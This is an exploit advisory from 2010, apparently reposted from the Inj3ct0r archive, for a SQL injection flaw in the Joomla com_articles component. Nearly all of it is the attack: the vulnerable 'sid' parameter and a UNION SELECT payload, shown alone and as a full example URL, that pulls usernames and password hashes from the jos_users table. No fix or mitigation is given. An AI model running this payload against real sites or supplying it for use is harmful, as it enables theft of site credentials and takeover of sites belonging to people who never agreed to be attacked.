Home / os / win7

Joomla Component com_articles SQL Injection Vulnerability

Posted on 08 April 2010

=========================================================
Joomla Component com_articles SQL Injection Vulnerability
=========================================================

                                          ****************************************************************************                            
                                            
                                                     Joomla Component com_articles SQL Injection Vulnerability
 
                                          ****************************************************************************
 
 
# Vulnerability  :       Joomla Component com_articles SQL Injection Vulnerability
 
# email          :       Pratulag@yahoo.com
 
# Author         :       Pratul Agrawal
 
 
 
 
 
  
 
   
************************************************   ExploiT   *******************************************************
   
 [*] Vulnerable File :
   
        http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=[SQL]
   
 [*] ExploiT         :
   
       9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—
   
 [*] Example         :
   
    http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—
  
    
********************************************************************************************************************



# Inj3ct0r.com [2010-04-08]

 

TOP

Malware :

Exploits :